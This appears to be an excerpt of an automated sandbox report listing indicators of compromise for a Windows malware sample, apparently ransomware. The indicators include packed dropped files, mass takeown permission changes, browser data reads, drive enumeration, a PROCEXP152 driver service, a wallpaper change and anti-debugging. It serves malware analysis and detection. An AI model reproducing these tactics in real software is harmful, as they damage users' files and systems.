behavioral1/files/0x00030000000131d5-1373.dat upx behavioral1/files/0x00030000000131d5-1374.dat upx behavioral1/files/0x00030000000131d5-1376.dat upx behavioral1/files/0x00030000000131d5-1381.dat upx behavioral1/files/0x00030000000131d5-1383.dat upx behavioral1/files/0x00030000000131d5-1384.dat upx behavioral1/files/0x00030000000131d5-1386.dat upx behavioral1/files/0x00030000000131d5-1391.dat upx behavioral1/files/0x00030000000131d5-1393.dat upx behavioral1/files/0x00030000000131d5-1394.dat upx behavioral1/files/0x00030000000131d5-1396.dat upx behavioral1/files/0x00030000000131d5-1401.dat upx behavioral1/files/0x00030000000131d5-1403.dat upx behavioral1/files/0x00030000000131d5-1404.dat upx behavioral1/files/0x00030000000131d5-1406.dat upx behavioral1/files/0x00030000000131d5-1411.dat upx behavioral1/files/0x00030000000131d5-1413.dat upx behavioral1/files/0x00030000000131d5-1414.dat upx behavioral1/files/0x00030000000131d5-1416.dat upx behavioral1/files/0x00030000000131d5-1421.dat upx behavioral1/files/0x00030000000131d5-1423.dat upx behavioral1/files/0x00030000000131d5-1424.dat upx behavioral1/files/0x00030000000131d5-1426.dat upx behavioral1/files/0x00030000000131d5-1431.dat upx behavioral1/files/0x00030000000131d5-1433.dat upx behavioral1/files/0x00030000000131d5-1434.dat upx behavioral1/files/0x00030000000131d5-1436.dat upx behavioral1/files/0x00030000000131d5-1441.dat upx behavioral1/files/0x00030000000131d5-1443.dat upx behavioral1/files/0x00030000000131d5-1444.dat upx behavioral1/files/0x00030000000131d5-1446.dat upx behavioral1/files/0x00030000000131d5-1451.dat upx behavioral1/files/0x00030000000131d5-1453.dat upx behavioral1/files/0x00030000000131d5-1454.dat upx behavioral1/files/0x00030000000131d5-1456.dat upx behavioral1/files/0x00030000000131d5-1461.dat upx behavioral1/files/0x00030000000131d5-1463.dat upx behavioral1/files/0x00030000000131d5-1464.dat upx behavioral1/files/0x00030000000131d5-1466.dat upx behavioral1/files/0x00030000000131d5-1471.dat upx behavioral1/files/0x00030000000131d5-1473.dat upx behavioral1/files/0x00030000000131d5-1474.dat upx behavioral1/files/0x00030000000131d5-1476.dat upx behavioral1/files/0x00030000000131d5-1481.dat upx behavioral1/files/0x00030000000131d5-1483.dat upx behavioral1/files/0x00030000000131d5-1484.dat upx behavioral1/files/0x00030000000131d5-1486.dat upx behavioral1/files/0x00030000000131d5-1491.dat upx behavioral1/files/0x00030000000131d5-1493.dat upx behavioral1/files/0x00030000000131d5-1494.dat upx behavioral1/files/0x00030000000131d5-1496.dat upx behavioral1/files/0x00030000000131d5-1501.dat upx behavioral1/files/0x00030000000131d5-1503.dat upx behavioral1/files/0x00030000000131d5-1504.dat upx behavioral1/files/0x00030000000131d5-1506.dat upx behavioral1/files/0x00030000000131d5-1511.dat upx behavioral1/files/0x00030000000131d5-1513.dat upx behavioral1/files/0x00030000000131d5-1514.dat upx behavioral1/files/0x00030000000131d5-1516.dat upx behavioral1/files/0x00030000000131d5-1521.dat upx behavioral1/files/0x00030000000131d5-1523.dat upx behavioral1/files/0x00030000000131d5-1524.dat upx behavioral1/files/0x00030000000131d5-1526.dat upx behavioral1/files/0x00030000000131d5-1531.dat upx behavioral1/files/0x00030000000131d5-1533.dat upx behavioral1/files/0x00030000000131d5-1534.dat upx behavioral1/files/0x00030000000131d5-1536.dat upx behavioral1/files/0x00030000000131d5-1541.dat upx behavioral1/files/0x00030000000131d5-1543.dat upx behavioral1/files/0x00030000000131d5-1544.dat upx behavioral1/files/0x00030000000131d5-1546.dat upx behavioral1/files/0x00030000000131d5-1552.dat upx behavioral1/files/0x00030000000131d5-1554.dat upx behavioral1/files/0x00030000000131d5-1555.dat upx behavioral1/files/0x00030000000131d5-1557.dat upx behavioral1/files/0x00030000000131d5-1562.dat upx behavioral1/files/0x00030000000131d5-1564.dat upx behavioral1/files/0x00030000000131d5-1565.dat upx behavioral1/files/0x00030000000131d5-1567.dat upx behavioral1/files/0x00030000000131d5-1572.dat upx behavioral1/files/0x00030000000131d5-1574.dat upx behavioral1/files/0x00030000000131d5-1575.dat upx behavioral1/files/0x00030000000131d5-1577.dat upx behavioral1/files/0x00030000000131d5-1582.dat upx behavioral1/files/0x00030000000131d5-1584.dat upx behavioral1/files/0x00030000000131d5-1585.dat upx behavioral1/files/0x00030000000131d5-1587.dat upx behavioral1/files/0x00030000000131d5-1592.dat upx behavioral1/files/0x00030000000131d5-1594.dat upx behavioral1/files/0x00030000000131d5-1595.dat upx behavioral1/files/0x00030000000131d5-1597.dat upx behavioral1/files/0x00030000000131d5-1602.dat upx behavioral1/files/0x00030000000131d5-1604.dat upx behavioral1/files/0x00030000000131d5-1605.dat upx behavioral1/files/0x00030000000131d5-1607.dat upx behavioral1/files/0x00030000000131d5-1612.dat upx behavioral1/files/0x00030000000131d5-1614.dat upx behavioral1/files/0x00030000000131d5-1615.dat upx behavioral1/files/0x00030000000131d5-1617.dat upx behavioral1/files/0x00030000000131d5-1622.dat upx behavioral1/files/0x00030000000131d5-1624.dat upx behavioral1/files/0x00030000000131d5-1625.dat upx behavioral1/files/0x00030000000131d5-1627.dat upx behavioral1/files/0x00030000000131d5-1632.dat upx behavioral1/files/0x00030000000131d5-1634.dat upx behavioral1/files/0x00030000000131d5-1635.dat upx behavioral1/files/0x00030000000131d5-1637.dat upx behavioral1/files/0x00030000000131d5-1642.dat upx behavioral1/files/0x00030000000131d5-1644.dat upx behavioral1/files/0x00030000000131d5-1645.dat upx behavioral1/files/0x00030000000131d5-1647.dat upx behavioral1/files/0x00030000000131d5-1652.dat upx behavioral1/files/0x00030000000131d5-1654.dat upx behavioral1/files/0x00030000000131d5-1655.dat upx behavioral1/files/0x00030000000131d5-1657.dat upx behavioral1/files/0x00030000000131d5-1662.dat upx behavioral1/files/0x00030000000131d5-1664.dat upx behavioral1/files/0x00030000000131d5-1665.dat upx behavioral1/files/0x00030000000131d5-1667.dat upx behavioral1/files/0x00030000000131d5-1672.dat upx behavioral1/files/0x00030000000131d5-1674.dat upx behavioral1/files/0x00030000000131d5-1675.dat upx behavioral1/files/0x00030000000131d5-1677.dat upx behavioral1/files/0x00030000000131d5-1682.dat upx behavioral1/files/0x00030000000131d5-1684.dat upx behavioral1/files/0x00030000000131d5-1685.dat upx behavioral1/files/0x00030000000131d5-1687.dat upx behavioral1/files/0x00030000000131d5-1692.dat upx behavioral1/files/0x00030000000131d5-1694.dat upx behavioral1/files/0x00030000000131d5-1695.dat upx behavioral1/files/0x00030000000131d5-1697.dat upx behavioral1/files/0x00030000000131d5-1702.dat upx behavioral1/files/0x00030000000131d5-1704.dat upx behavioral1/files/0x00030000000131d5-1705.dat upx behavioral1/files/0x00030000000131d5-1707.dat upx behavioral1/files/0x00030000000131d5-1712.dat upx behavioral1/files/0x00030000000131d5-1714.dat upx behavioral1/files/0x00030000000131d5-1715.dat upx behavioral1/files/0x00030000000131d5-1717.dat upx behavioral1/files/0x00030000000131d5-1722.dat upx behavioral1/files/0x00030000000131d5-1724.dat upx behavioral1/files/0x00030000000131d5-1725.dat upx behavioral1/files/0x00030000000131d5-1727.dat upx behavioral1/files/0x00030000000131d5-1732.dat upx behavioral1/files/0x00030000000131d5-1734.dat upx behavioral1/files/0x00030000000131d5-1735.dat upx behavioral1/files/0x00030000000131d5-1737.dat upx behavioral1/files/0x00030000000131d5-1742.dat upx behavioral1/files/0x00030000000131d5-1744.dat upx behavioral1/files/0x00030000000131d5-1745.dat upx behavioral1/files/0x00030000000131d5-1747.dat upx behavioral1/files/0x00030000000131d5-1752.dat upx behavioral1/files/0x00030000000131d5-1754.dat upx behavioral1/files/0x00030000000131d5-1755.dat upx behavioral1/files/0x00030000000131d5-1757.dat upx behavioral1/files/0x00030000000131d5-1762.dat upx behavioral1/files/0x00030000000131d5-1764.dat upx behavioral1/files/0x00030000000131d5-1765.dat upx behavioral1/files/0x00030000000131d5-1767.dat upx behavioral1/files/0x00030000000131d5-1772.dat upx behavioral1/files/0x00030000000131d5-1774.dat upx behavioral1/files/0x00030000000131d5-1775.dat upx behavioral1/files/0x00030000000131d5-1777.dat upx behavioral1/files/0x00030000000131d5-1782.dat upx behavioral1/files/0x00030000000131d5-1784.dat upx behavioral1/files/0x00030000000131d5-1785.dat upx behavioral1/files/0x00030000000131d5-1787.dat upx behavioral1/files/0x00030000000131d5-1792.dat upx behavioral1/files/0x00030000000131d5-1794.dat upx behavioral1/files/0x00030000000131d5-1795.dat upx behavioral1/files/0x00030000000131d5-1797.dat upx behavioral1/files/0x00030000000131d5-1802.dat upx behavioral1/files/0x00030000000131d5-1804.dat upx behavioral1/files/0x00030000000131d5-1805.dat upx behavioral1/files/0x00030000000131d5-1807.dat upx behavioral1/files/0x00030000000131d5-1812.dat upx behavioral1/files/0x00030000000131d5-1814.dat upx behavioral1/files/0x00030000000131d5-1815.dat upx behavioral1/files/0x00030000000131d5-1817.dat upx -
Loads dropped DLL 360 IoCs
pid Process 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 972 cmd.exe 2000 B4ux2Scs.exe 1736 cmd.exe 1924 cmd.exe 472 cmd.exe 1952 cmd.exe 1244 cmd.exe 1840 cmd.exe 700 cmd.exe 548 cmd.exe 1572 cmd.exe 1736 cmd.exe 1644 cmd.exe 320 cmd.exe 436 cmd.exe 992 cmd.exe 1848 cmd.exe 1244 cmd.exe 1644 cmd.exe 1896 cmd.exe 980 cmd.exe 1756 cmd.exe 1792 cmd.exe 1636 cmd.exe 992 cmd.exe 472 cmd.exe 1828 cmd.exe 1052 cmd.exe 548 cmd.exe 1636 cmd.exe 1848 cmd.exe 1896 cmd.exe 1068 cmd.exe 1468 cmd.exe 1128 cmd.exe 1840 cmd.exe 320 cmd.exe 980 cmd.exe 700 cmd.exe 756 cmd.exe 1032 cmd.exe 220 cmd.exe 1840 cmd.exe 1820 cmd.exe 1372 cmd.exe 1960 cmd.exe 1052 cmd.exe 1368 cmd.exe 1936 cmd.exe 1512 cmd.exe 1384 cmd.exe 1128 cmd.exe 980 cmd.exe 896 cmd.exe 992 cmd.exe 1928 cmd.exe 760 cmd.exe 1820 cmd.exe 1680 cmd.exe 216 cmd.exe 700 cmd.exe 652 cmd.exe 280 cmd.exe 220 cmd.exe 896 cmd.exe 1576 cmd.exe 652 cmd.exe 524 cmd.exe 1128 cmd.exe 984 cmd.exe 212 cmd.exe 436 cmd.exe 908 cmd.exe 320 cmd.exe 992 cmd.exe 1224 cmd.exe 980 cmd.exe 1812 cmd.exe 1752 cmd.exe 1216 cmd.exe 544 cmd.exe 1220 cmd.exe 964 cmd.exe 1576 cmd.exe 232 cmd.exe 524 cmd.exe 1384 cmd.exe 992 cmd.exe 1896 cmd.exe 980 cmd.exe 1920 cmd.exe 1752 cmd.exe 1512 cmd.exe 744 cmd.exe 904 cmd.exe 864 cmd.exe 212 cmd.exe 1968 cmd.exe 1956 cmd.exe 1496 cmd.exe 700 cmd.exe 1240 cmd.exe 1848 cmd.exe 544 cmd.exe 364 cmd.exe 964 cmd.exe 652 cmd.exe 1156 cmd.exe 220 cmd.exe 1372 cmd.exe 1520 cmd.exe 1812 cmd.exe 1384 cmd.exe 1552 cmd.exe 236 cmd.exe 1488 cmd.exe 1836 cmd.exe 1080 cmd.exe 896 cmd.exe 1052 cmd.exe 592 cmd.exe 1896 cmd.exe 1652 cmd.exe 1576 cmd.exe 228 cmd.exe 2044 cmd.exe 756 cmd.exe 280 cmd.exe 1220 cmd.exe 676 cmd.exe 1572 cmd.exe 1736 cmd.exe 232 cmd.exe 992 cmd.exe 1752 cmd.exe 548 cmd.exe 1496 cmd.exe 1052 cmd.exe 204 cmd.exe 1372 cmd.exe 1156 cmd.exe 700 cmd.exe 1828 cmd.exe 908 cmd.exe 220 cmd.exe 280 cmd.exe 1032 cmd.exe 1836 cmd.exe 1960 cmd.exe 1644 cmd.exe 992 cmd.exe 1968 cmd.exe 548 cmd.exe 212 cmd.exe 228 cmd.exe 904 cmd.exe 364 cmd.exe 1552 cmd.exe 1496 cmd.exe 1488 cmd.exe 236 cmd.exe 1376 cmd.exe 1216 cmd.exe 744 cmd.exe 548 cmd.exe 676 cmd.exe 228 cmd.exe 896 cmd.exe 760 cmd.exe 360 cmd.exe 984 cmd.exe 1644 cmd.exe 1652 cmd.exe 1156 cmd.exe 436 cmd.exe 592 cmd.exe 320 cmd.exe 952 cmd.exe 1572 cmd.exe 1836 cmd.exe 548 cmd.exe 1496 cmd.exe 228 cmd.exe 236 cmd.exe 1292 cmd.exe 544 cmd.exe 524 cmd.exe 280 cmd.exe 1652 cmd.exe 1576 cmd.exe 436 cmd.exe 232 cmd.exe 1032 cmd.exe 948 cmd.exe 1520 cmd.exe 1848 cmd.exe 1180 cmd.exe 908 cmd.exe 948 cmd.exe 1488 cmd.exe 236 cmd.exe 1828 cmd.exe 1920 cmd.exe 984 cmd.exe 1652 cmd.exe 904 cmd.exe 1220 cmd.exe 1836 cmd.exe 1552 cmd.exe 1496 cmd.exe 364 cmd.exe 760 cmd.exe 1080 cmd.exe 548 cmd.exe 948 cmd.exe 676 cmd.exe 236 cmd.exe 964 cmd.exe 952 cmd.exe 1052 cmd.exe 1652 cmd.exe 1368 cmd.exe 1220 cmd.exe 1224 cmd.exe 1552 cmd.exe 216 cmd.exe 1216 cmd.exe 204 cmd.exe 1572 cmd.exe 568 cmd.exe 744 cmd.exe 232 cmd.exe 1828 cmd.exe 992 cmd.exe 212 cmd.exe 544 cmd.exe 904 cmd.exe 948 cmd.exe 236 cmd.exe 320 cmd.exe 1960 cmd.exe 1752 cmd.exe 216 cmd.exe 676 cmd.exe 280 cmd.exe 1836 cmd.exe 1156 cmd.exe 360 cmd.exe 1052 cmd.exe 1520 cmd.exe 1068 cmd.exe 652 cmd.exe 544 cmd.exe 756 cmd.exe 1896 cmd.exe 1080 cmd.exe 864 cmd.exe 1224 cmd.exe 568 cmd.exe 1368 cmd.exe 280 cmd.exe 236 cmd.exe 1156 cmd.exe 744 cmd.exe 1064 cmd.exe 948 cmd.exe 364 cmd.exe 228 cmd.exe 1948 cmd.exe 904 cmd.exe 756 cmd.exe 1956 cmd.exe 864 cmd.exe 1240 cmd.exe 568 cmd.exe 2044 cmd.exe 280 cmd.exe 1180 cmd.exe 1156 cmd.exe 1576 cmd.exe 1292 cmd.exe 1752 cmd.exe 992 cmd.exe 1032 cmd.exe 676 cmd.exe 1224 cmd.exe 1512 cmd.exe 1896 cmd.exe 1488 cmd.exe 1968 cmd.exe 1068 cmd.exe 1052 cmd.exe 2044 cmd.exe 220 cmd.exe 1968 cmd.exe 1032 cmd.exe 1080 cmd.exe 948 cmd.exe 320 cmd.exe 864 cmd.exe 1032 cmd.exe 212 cmd.exe 524 cmd.exe 216 cmd.exe 2044 cmd.exe 1216 cmd.exe 1064 cmd.exe 1292 cmd.exe 952 cmd.exe 204 cmd.exe 1216 cmd.exe 1220 cmd.exe 980 cmd.exe 1512 cmd.exe 1376 cmd.exe 216 cmd.exe 1220 cmd.exe 1472 cmd.exe 1512 cmd.exe 1292 cmd.exe 1488 cmd.exe 204 cmd.exe 1472 cmd.exe 1968 cmd.exe 1292 cmd.exe 1080 cmd.exe 204 cmd.exe 216 cmd.exe 1652 cmd.exe 1032 cmd.exe 1376 cmd.exe 952 cmd.exe 436 cmd.exe 744 cmd.exe 1180 cmd.exe 904 cmd.exe 224 cmd.exe 320 cmd.exe 360 cmd.exe 984 cmd.exe 1836 cmd.exe 280 cmd.exe 204 cmd.exe 1840 cmd.exe 1752 cmd.exe 216 cmd.exe 864 cmd.exe 896 cmd.exe 592 cmd.exe 1224 cmd.exe 524 cmd.exe 236 cmd.exe 1488 cmd.exe 1156 cmd.exe 1372 cmd.exe 212 cmd.exe 1472 cmd.exe 548 cmd.exe -
Modifies file permissions 1 TTPs 179 IoCs
pid Process 752 takeown.exe 1896 takeown.exe 1960 takeown.exe 1068 takeown.exe 1836 takeown.exe 756 takeown.exe 568 takeown.exe 984 takeown.exe 760 takeown.exe 676 takeown.exe 212 takeown.exe 232 takeown.exe 1848 takeown.exe 1820 takeown.exe 1572 takeown.exe 280 takeown.exe 760 takeown.exe 1752 takeown.exe 216 takeown.exe 1896 takeown.exe 984 takeown.exe 908 takeown.exe 744 takeown.exe 1240 takeown.exe 1368 takeown.exe 1472 takeown.exe 592 takeown.exe 1032 takeown.exe 896 takeown.exe 2044 takeown.exe 524 takeown.exe 592 takeown.exe 1240 takeown.exe 1820 takeown.exe 204 takeown.exe 1032 takeown.exe 2044 takeown.exe 952 takeown.exe 652 takeown.exe 1240 takeown.exe 1896 takeown.exe 1032 takeown.exe 1576 takeown.exe 904 takeown.exe 1680 takeown.exe 980 takeown.exe 980 takeown.exe 524 takeown.exe 1520 takeown.exe 1180 takeown.exe 568 takeown.exe 700 takeown.exe 984 takeown.exe 756 takeown.exe 1948 takeown.exe 676 takeown.exe 1812 takeown.exe 1752 takeown.exe 1752 takeown.exe 676 takeown.exe 952 takeown.exe 1220 takeown.exe 220 takeown.exe 1812 takeown.exe 1176 takeown.exe 1520 takeown.exe 652 takeown.exe 236 takeown.exe 1156 takeown.exe 1384 takeown.exe 224 takeown.exe 1572 takeown.exe 836 takeown.exe 1784 takeown.exe 676 takeown.exe 948 takeown.exe 364 takeown.exe 1644 takeown.exe 992 takeown.exe 964 takeown.exe 220 takeown.exe 1216 takeown.exe 1828 takeown.exe 360 takeown.exe 1384 takeown.exe 220 takeown.exe 524 takeown.exe 236 takeown.exe 220 takeown.exe 212 takeown.exe 1752 takeown.exe 1820 takeown.exe 1216 takeown.exe 652 takeown.exe 700 takeown.exe 1068 takeown.exe 1920 takeown.exe 1052 takeown.exe 1224 takeown.exe 1736 takeown.exe 1836 takeown.exe 952 takeown.exe 676 takeown.exe 992 takeown.exe 228 takeown.exe 1960 takeown.exe 1080 takeown.exe 1644 takeown.exe 1156 takeown.exe 524 takeown.exe 224 takeown.exe 1216 takeown.exe 756 takeown.exe 280 takeown.exe 1848 takeown.exe 1472 takeown.exe 1488 takeown.exe 1292 takeown.exe 1068 takeown.exe 236 takeown.exe 992 takeown.exe 992 takeown.exe 676 takeown.exe 1180 takeown.exe 1216 takeown.exe 1068 takeown.exe 1960 takeown.exe 744 takeown.exe 364 takeown.exe 896 takeown.exe 1068 takeown.exe 1812 takeown.exe 952 takeown.exe 212 takeown.exe 908 takeown.exe 1080 takeown.exe 360 takeown.exe 320 takeown.exe 980 takeown.exe 216 takeown.exe 544 takeown.exe 1068 takeown.exe 1520 takeown.exe 1896 takeown.exe 1032 takeown.exe 1240 takeown.exe 592 takeown.exe 1920 takeown.exe 700 takeown.exe 1368 takeown.exe 700 takeown.exe 1572 takeown.exe 1488 takeown.exe 1372 takeown.exe 676 takeown.exe 1848 takeown.exe 1896 takeown.exe 1968 takeown.exe 904 takeown.exe 1792 takeown.exe 1956 takeown.exe 1840 takeown.exe 2044 takeown.exe 1436 takeown.exe 280 takeown.exe 232 takeown.exe 1224 takeown.exe 1180 takeown.exe 204 takeown.exe 360 takeown.exe 1960 takeown.exe 364 takeown.exe 1680 takeown.exe 1292 takeown.exe 1644 takeown.exe 2044 takeown.exe 1960 takeown.exe 760 takeown.exe 232 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 34 IoCs
description ioc Process File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AJM03J3Y\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\TGVUK4BG\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Admin\Links\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ZMLBLRQ7\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Public\Music\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\RBDIK06K\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Public\Videos\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Admin\Music\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Public\Documents\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Public\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\L: B4ux2Scs64.exe File opened (read-only) \??\Y: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\T: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\O: B4ux2Scs64.exe File opened (read-only) \??\U: B4ux2Scs64.exe File opened (read-only) \??\U: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\F: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\P: B4ux2Scs64.exe File opened (read-only) \??\W: B4ux2Scs64.exe File opened (read-only) \??\B: B4ux2Scs64.exe File opened (read-only) \??\F: B4ux2Scs64.exe File opened (read-only) \??\I: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\A: B4ux2Scs64.exe File opened (read-only) \??\K: B4ux2Scs64.exe File opened (read-only) \??\Y: B4ux2Scs64.exe File opened (read-only) \??\V: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\N: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\L: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\J: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\H: B4ux2Scs64.exe File opened (read-only) \??\R: B4ux2Scs64.exe File opened (read-only) \??\S: B4ux2Scs64.exe File opened (read-only) \??\Z: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\M: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\K: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\H: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\E: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\Q: B4ux2Scs64.exe File opened (read-only) \??\X: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\R: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\I: B4ux2Scs64.exe File opened (read-only) \??\M: B4ux2Scs64.exe File opened (read-only) \??\N: B4ux2Scs64.exe File opened (read-only) \??\T: B4ux2Scs64.exe File opened (read-only) \??\V: B4ux2Scs64.exe File opened (read-only) \??\O: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\G: B4ux2Scs64.exe File opened (read-only) \??\Q: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\P: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\E: B4ux2Scs64.exe File opened (read-only) \??\J: B4ux2Scs64.exe File opened (read-only) \??\X: B4ux2Scs64.exe File opened (read-only) \??\Z: B4ux2Scs64.exe File opened (read-only) \??\W: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened (read-only) \??\S: 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe -
Modifies service 2 TTPs 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152 B4ux2Scs64.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ErrorControl = "1" B4ux2Scs64.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\Start = "3" B4ux2Scs64.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152 B4ux2Scs64.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\Type = "1" B4ux2Scs64.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" B4ux2Scs64.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\tlpUxQ1t.bmp" reg.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1936 NWgvgGUu.exe -
Drops file in Program Files directory 3067 IoCs
